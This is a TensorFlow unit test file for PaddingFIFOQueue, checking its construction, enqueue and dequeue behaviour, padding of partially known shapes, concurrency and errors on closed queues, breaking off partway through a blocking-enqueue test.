padding_fifo_queue_test.py
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
# pylint: disable=unused-import,g-bad-import-order
import tensorflow.python.platform
# pylint: enable=unused-import,g-bad-import-order
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
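# PaddingFIFOQueue behaves like FIFOQueue except that component shapes may be
# only partially known (dimensions given as None), and dequeue_many pads each
# unknown dimension up to the largest value present in the dequeued batch
# (0 for numbers, b"" for strings). A minimal sketch of that behaviour, using
# the graph-mode API exercised by the tests below and assuming a default
# session is active:
#
#   q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((None,),))
#   q.enqueue(([1],)).run()
#   q.enqueue(([2, 3],)).run()
#   q.dequeue_many(2).eval()  # -> [[1, 0], [2, 3]]; the shorter element is padded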
class PaddingFIFOQueueTest(tf.test.TestCase):
def testConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEqual(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
((), ()),
shared_name="foo", name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEqual(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
shapes=(tf.TensorShape([1, 1, 2, 3]),
tf.TensorShape([5, 8])), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEqual(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, [tf.int32, tf.int32],
shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue, args=(e,))
for e in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = dequeued_t.eval()
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(3, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, size.eval())
dequeued_t.op.run()
self.assertEqual(0, size.eval())
def testEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = dequeued_t.eval()
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None, None),))
empty_t = tf.constant([], dtype=tf.float32,
shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], size_t.eval())
enqueue_op.run()
self.assertEqual([0], size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testConstructPaddingFIFOQueueWithNoShape(self):
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
tf.PaddingFIFOQueue(10, tf.float32, None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), ((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], dequeued_t.eval())
self.assertAllEqual(elems[4:8], dequeued_t.eval())
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32),
shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.string, tf.int32),
shapes=((None,), (1, None)))
str_elems = [
["a"],
["ab"],
["abc"],
["abc", "d"],
["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [
[[1]],
[[2]],
[[3]],
[[1, 2]],
[[1, 2, 3]],
[[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(
[[b"a", b"", b""], [b"ab", b"", b""], [b"abc", b"", b""],
[b"abc", b"d", b""], [b"abc", b"d", b"e"]], string_val)
self.assertAllEqual(
[[[1, 0, 0]],
[[2, 0, 0]],
[[3, 0, 0]],
[[1, 2, 0]],
[[1, 2, 3]]],
int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32, tf.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(tf.int32, enq.inputs[1].dtype)
self.assertEqual(tf.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
with self.assertRaises(ValueError):
q.enqueue((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError, r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
dequeued_t.eval()
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(50, tf.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
sess.run(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(sess.run(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_placeholder = tf.placeholder(tf.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = tf.placeholder(
tf.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(elements_enqueued,
elements_enqueued + count,
dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = tf.placeholder(tf.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
sess.run(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, dequeued_t.eval())
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(elements_dequeued,
elements_dequeued + count,
dtype=np.int32)
self.assertAllEqual(
expected_range, dequeuemany_t.eval({count_placeholder: count}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = tf.PaddingFIFOQueue(100, tf.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = tf.PaddingFIFOQueue(total_count, tf.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
sess.run(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], sess.run(dequeued_t))
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(dequeued_t)
self.assertEqual(elems[3], sess.run(cleanup_dequeue_t))
def close():
sess.run(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, (tf.float32, tf.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = sess.run([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
